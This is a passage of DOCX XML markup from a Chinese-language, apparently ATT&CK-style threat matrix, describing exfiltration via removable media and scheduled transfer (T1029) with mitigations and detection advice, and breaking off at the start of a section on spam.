              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据丢失</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253A7F56" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5033BB4A" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="329CE60C" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4832309A" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些情况下，例如当网闸隔离</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络遭受攻击时，数据渗漏可能会在用户引入的物理介质或设备上发生。这样的介质可以是外接硬盘，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘，蜂窝电话，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MP3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>播放器或其他可移动存储和处理设备。物理介质或设备可以用作最终渗漏点，也可以用于在其他断连系统之间跳转。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F6068" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2861"/>
        <w:gridCol w:w="6875"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00127383" w14:paraId="6E090F9F" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="59A2552A" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6875" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="43AA0EDD" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="75BF8618" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2861" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CA930B5" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId254" w:history="1">
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特性</w:t>
              </w:r>
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>程序</w:t>
              </w:r>
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>禁用或移除</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6875" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31BE89F7" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果不需要，请禁用自动运行功能。如果业务操作不需要可移动介质，则在组织策略级别上禁止或限制它们。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F883DDB" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B9CD35" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FB38B" w14:textId="4B022B24" w:rsidR="00A0413E" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控可移动介质上的文件访问。检测装入可移动介质时执行的进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE33BD" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>定时传输</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="496FB0FE" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61439CB8" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1029</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E02E7C" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28643D9D" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="289C7F89" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络进程使用，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D579E6" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B218D7" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CE5E5A6" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA8084A" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能在一天中的特定时间或特定时间间隔执行数据渗漏攻击。这样</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>做</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以将流量模式与正常活动或可用性混合在一起。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B52E9CF" w14:textId="3AC64526" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>定时数据渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击时</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>同时使用其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗漏技术，例如经由</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据渗漏和</w:t>
      </w:r>
      <w:r w:rsidR="005A5E91">
        <w:t>备用协议上的数据渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，来将信息传输到网络之外。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E06577" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00127383" w14:paraId="7A55CD23" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="79A17A11" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="42D4D756" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="7E741E67" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48ABC22F" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId255" w:history="1">
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00455254" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基础设施</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>及恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。签名通常是协议中的唯一指示符，可能基于攻击者或工具的特定混淆技术，并且在各种恶意软件系列和版本中可能会有所不同。攻击者可能会随着时间的推移更改工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，或者构建协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>来逃避常见防御工具的检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47BF56F8" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12785292" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F03B05" w14:textId="2CA32EAB" w:rsidR="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程文件访问模式和网络行为。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>有无法识别的进程或脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>似乎正在遍历文件系统并发送网络流量，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑的。如果连续</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数天</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的同一时间都有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>指向同一个目的地的网络连接，则是可疑的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF06016" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383"/>
    <w:p w14:paraId="3C47A347" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
        <w:ind w:left="1560"/>
        <w:sectPr w:rsidR="00A0413E" w:rsidSect="00F815A5">
          <w:headerReference w:type="first" r:id="rId256"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63691CCA" w14:textId="796E2281" w:rsidR="00A0413E" w:rsidRDefault="008A6E65" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>恶劣</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21768D55" w14:textId="5C7EDC83" w:rsidR="008A5347" w:rsidRDefault="00F50EDA" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>垃圾</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>邮件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F50EDA" w14:paraId="2C0CFC55" w14:textId="77777777" w:rsidTr="00F50EDA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F08A7CF" w14:textId="146E067B" w:rsidR="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4143BC83" w14:textId="77777777" w:rsidR="00BE796A" w:rsidRPr="00A65911" w:rsidRDefault="00BE796A" w:rsidP="00BE796A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A1A937A" w14:textId="77777777" w:rsidR="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1898A303" w14:textId="77777777" w:rsidR="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
